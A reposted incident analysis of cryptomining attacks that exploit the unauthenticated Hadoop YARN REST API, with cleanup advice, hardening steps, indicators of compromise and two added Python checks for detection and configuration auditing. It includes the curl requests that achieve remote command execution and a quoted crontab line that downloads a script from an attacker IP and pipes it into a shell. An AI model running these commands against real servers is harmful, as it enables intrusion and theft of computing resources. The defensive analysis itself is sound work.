Hadoop Yarn hack?

Take a look at the pscf process in top.

Original title: Hadoop Yarn REST API Unauthorized Vulnerability Mining Analysis

One, background

On May 5th, Tencent's cloud security team issued a warning about attackers exploiting an unauthorized-access vulnerability in the REST API of the Hadoop YARN resource management system to attack servers and execute code remotely without authentication. Around that time we captured several related attack cases, including the use of this issue for cryptocurrency mining. We analyzed one of those cases and provide security recommendations and remediation steps in response.

Second, the vulnerability description

Hadoop is a distributed system infrastructure developed by the Apache Foundation. YARN is the unified resource management platform of the Hadoop system; its main role is the unified management and scheduling of cluster resources. The MapReduce computing framework runs as an application on top of YARN and obtains its resources through YARN. Put simply, a user can submit an application to YARN for execution, and the launch command of that application can include arbitrary system commands.

YARN exposes REST APIs on ports 8088 (HTTP, the default) and 8090 (HTTPS), through which users can directly create applications, submit tasks, and perform related operations. If the REST API is misconfigured and exposed to the public internet, it permits unauthorized access: any attacker can use it for remote command execution, for example to run cryptocurrency miners.

Attack step 1: apply for a new application

Send the POST request directly with curl:

curl -v -X POST 'http://ip:8088/ws/v1/cluster/apps/new-application'

The response looks similar to:

{"application-id":"application_1527144634877_20465","maximum-resource-capability":{"memory":16384,"vCores":8}}

Attack step 2: construct and submit the task

Construct a JSON file 1.json with the following content, where application-id is the id obtained above and the command attempts to create a file named 11112222_test_111122222 in the /var/tmp directory with the content 111:

Then submit it directly with:

curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://ip:8088/ws/v1/cluster/apps --data-binary @1.json

That completes the attack: the command is executed, and the corresponding file can be seen in the target directory.

More details of the vulnerability can be found at http://bbs.qcloud.com/thread-50090-1-1.html

Third, intrusion analysis

In the case analyzed here, the victim machine runs Hadoop YARN with the unauthorized-access problem described above. The attackers used the REST API exposed on port 8088 to submit a command that downloads and executes a .sh script on the server, which in turn downloads further files and starts the mining process.

The whole exploitation process is quite simple. From the captured launch_container.sh script generated by Hadoop, we can see the commands executed by the relevant task in one of the cases:

Line 8 clearly shows the download and execution of a script named x_wcr.sh from 185.222.210.59.

In practice we captured several scripts such as cr.sh from multiple cases, but their functional code is similar. We analyzed one of the x_wcr.sh scripts from top to bottom:

This part of the code mainly cleans up existing mining processes and files.

This part checks whether /tmp/java exists as a writable file and, if so, whether its MD5 value matches; if the MD5 does not match, processes are located by the keyword w.conf and killed. If the file is not writable, the DIR variable is reassigned; DIR is the directory used to store the downloaded miner and other programs.

Next come several variable assignments: if /tmp/java is a directory, DIR is reassigned again; if curl or wget is available, it is assigned to the WGET variable; and f2 is set to an IP address, which is in fact one of the servers used to download the related files.

This part is the core of the script. It downloads the mining program into the $DIR directory through the downloadIfNeed method and renames it to java, downloads the w.conf configuration file, adds execute permission to the miner, runs it in the background with nohup, and then deletes the configuration file. It then checks the crontab: if no corresponding task exists, an entry that downloads and executes the script, "* * * * * $LDR http://185.222.210.59/cr.sh | sh > /dev/null 2>&1", is added, where $LDR is either "wget -q -O -" or "curl", so the task runs once every minute.

The script also contains several nested download methods. The entry method is downloadIfNeed:

The core function of this method is to verify the MD5 of the existing mining program. If the file does not exist or cannot be verified, it calls the download method directly to fetch the miner. If the file exists but the MD5 does not match, it calls the download method and verifies again; if verification still fails, it tries to fetch the miner from an alternative download channel, https://transfer.sh/WoGXx/zzz, and verifies once more. Finally, the result is reported to re.php on the server $f2.

Sample tmp.txt content:

The download method checks whether the ppc file exists and whether its MD5 matches. If it does not exist or the MD5 does not match, download2 is called; if it does, the file is copied and named java.

The download2 method then determines the system type and downloads the corresponding version of the mining program, where http://185.222.210.59/g.php returns another IP address; after a successful download the file is verified again and a copy is renamed ppc.

The last part of the script cleans up processes, files and crontab entries: pkill is used to kill processes matching certain conditions, files in the tmp directory under pscd are deleted, and some crontab tasks are removed.

At this point the analysis of the entire script is complete. Although the script is rather verbose, with each function nested and called from another and many files involved, it really does only two things:

1. Clean up the related processes, files and crontab tasks.
2. Check for and download the mining program, verifying its MD5 value, with https://transfer.sh as a backup download source in addition to the server controlled by the attackers.

The corresponding traces can also be seen in YARN's log file yarn-root-nodemanager-master.hadoop.log:

Or the application details can be viewed through the management UI:

The crontab log also shows the relevant execution records:

Finally, the related files can be found in the /var/tmp directory:

Fourth, security advice: cleaning up the infection

1. Use top to inspect the process list and kill any abnormal process.
2. Check the /tmp and /var/tmp directories and delete java, ppc, w.conf and other abnormal files.
3. Check the crontab task list and delete any abnormal task.
4. Check the YARN logs, identify the abnormal application, and remove it.
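The checks in the cleanup list above, and the artifacts described in the intrusion analysis (a launch_container.sh that pipes a download into sh, the per-minute crontab entry, and the java, ppc and w.conf files in /tmp or /var/tmp), can be scripted as a read-only triage pass. The following is an added example, not code from the original article; the launch script, crontab and directory listing it runs over are constructed samples shaped like the case, and the function names are my own.

```python
import re

# "Fetch a URL and pipe it into a shell" is how both the YARN container
# command and the crontab entry in the case work (wget -q -O - or curl,
# then "| sh"). The fetcher may hide behind a variable such as $LDR, so
# only the URL and the pipe into sh/bash are required to match.
PIPE_TO_SHELL = re.compile(r"https?://\S+\s*\|\s*(?:ba)?sh\b")

# File names the miner script drops in /tmp and /var/tmp (from the analysis).
DROPPED_NAMES = {"java", "ppc", "w.conf"}


def suspicious_lines(text):
    """Return (line_number, line) for each line that pipes a download into sh.

    Works on a captured launch_container.sh as well as on `crontab -l` output.
    """
    return [(n, ln.strip()) for n, ln in enumerate(text.splitlines(), 1)
            if PIPE_TO_SHELL.search(ln)]


def suspicious_files(names):
    """Subset of directory entries whose names are on the dropped-file list."""
    return sorted(n for n in names if n in DROPPED_NAMES)


def triage(launch_script, crontab, tmp_entries):
    """Run all three checks and return one report dict (empty lists = clean)."""
    return {
        "launch_container": suspicious_lines(launch_script),
        "crontab": suspicious_lines(crontab),
        "dropped_files": suspicious_files(tmp_entries),
    }


# Constructed samples (not captured data), shaped like the artifacts in the case.
SAMPLE_LAUNCH = """#!/bin/bash
export LOCAL_DIRS="/tmp/hadoop-root/nm-local-dir/usercache/user/appcache/application_1527144634877_20465"
exec /bin/bash -c "curl http://185.222.210.59/x_wcr.sh | sh"
"""
SAMPLE_CRON = """0 3 * * * /usr/local/bin/backup.sh
* * * * * $LDR http://185.222.210.59/cr.sh|sh > /dev/null 2>&1
"""
SAMPLE_TMP = ["java", "ppc", "w.conf", "hsperfdata_root", "systemd-private-abc"]

if __name__ == "__main__":
    for section, hits in triage(SAMPLE_LAUNCH, SAMPLE_CRON, SAMPLE_TMP).items():
        print(section, hits)
```

On a live host, feed `triage` the contents of the launch_container.sh files under the NodeManager local directory, the output of `crontab -l` for root and the YARN user, and `os.listdir` of /tmp and /var/tmp.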

Security hardening

1. Configure access policies through iptables or security groups to restrict access to ports such as 8088.
2. If it is not necessary, do not expose the interface to the public network; restrict it to local or intranet access.
3. Upgrade Hadoop to version 2.x and enable Kerberos authentication to prevent anonymous access.
4. Cloud Mirror currently supports detection of this vulnerability and also detects mining Trojans. It is recommended to install Cloud Mirror and enable the Professional Edition so that vulnerabilities are detected and fixed in time, or a reminder is received promptly once a Trojan is blocked.
5. Further self-inspection and repair suggestions can be found at http://bbs.qcloud.com/thread-50090-1-1.html
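Items 2 and 3 above correspond to a handful of Hadoop configuration properties in core-site.xml and yarn-site.xml. The following added example (my own code, not from the article or the Hadoop project) parses those files and reports settings that leave the ResourceManager REST API anonymous or bound to every interface; the two embedded configurations are constructed, and 10.0.0.5 is a placeholder intranet address.

```python
import xml.etree.ElementTree as ET

# Real Hadoop/YARN property names. hadoop.* settings live in core-site.xml,
# yarn.* settings in yarn-site.xml; pass each file's text to audit().
# Defaults used when a key is absent match Hadoop's own defaults.


def load_props(xml_text):
    """Parse Hadoop-style <configuration><property> XML into a dict."""
    root = ET.fromstring(xml_text.strip())
    props = {}
    for prop in root.iter("property"):
        name, value = prop.findtext("name"), prop.findtext("value")
        if name is not None:
            props[name.strip()] = (value or "").strip()
    return props


def audit(*xml_texts):
    """Return a list of findings; an empty list means all checks passed."""
    p = {}
    for text in xml_texts:
        p.update(load_props(text))
    findings = []
    if p.get("hadoop.security.authentication", "simple") != "kerberos":
        findings.append("hadoop.security.authentication is not kerberos")
    if p.get("hadoop.http.authentication.type", "simple") != "kerberos":
        findings.append("hadoop.http.authentication.type is not kerberos: web/REST API is unauthenticated")
    if p.get("hadoop.http.authentication.simple.anonymous.allowed", "true").lower() == "true":
        findings.append("anonymous HTTP access is allowed")
    addr = p.get("yarn.resourcemanager.webapp.address", "")
    # Unset means ${yarn.resourcemanager.hostname}:8088, whose default host is 0.0.0.0.
    if addr == "" or addr.startswith("0.0.0.0"):
        findings.append("yarn.resourcemanager.webapp.address is unset or bound to all interfaces")
    return findings


# Constructed configurations: the weak one resembles a default install.
WEAK_CONFIG = """<configuration>
  <property><name>yarn.resourcemanager.webapp.address</name><value>0.0.0.0:8088</value></property>
</configuration>"""
HARDENED_CONFIG = """<configuration>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.simple.anonymous.allowed</name><value>false</value></property>
  <property><name>yarn.resourcemanager.webapp.address</name><value>10.0.0.5:8088</value></property>
</configuration>"""

if __name__ == "__main__":
    print("weak:", audit(WEAK_CONFIG))
    print("hardened:", audit(HARDENED_CONFIG))
```

Binding the web address to an intranet IP complements, rather than replaces, the iptables or security-group rules in item 1.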

V. IOCs

Wallet address

4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

MD5

1. c8c1f2da51fbd0aea60e11a81236c9dc
2. 183664ceb9c4d7179d5345249f1ee0c4
3. b00f4bbd82d2f5ec7c8152625684f853

Mining pool addresses

1. 158.69.133.20:3333
2. 192.99.142.249:3333
3. 202.144.193.110:3333
4. 46.30.43.159:80

Some related URLs


* Author: Ding lab. Please credit FreeBuf.COM when reposting.

Reposted at www.zuinow.com, 2018-06-03 08:22:19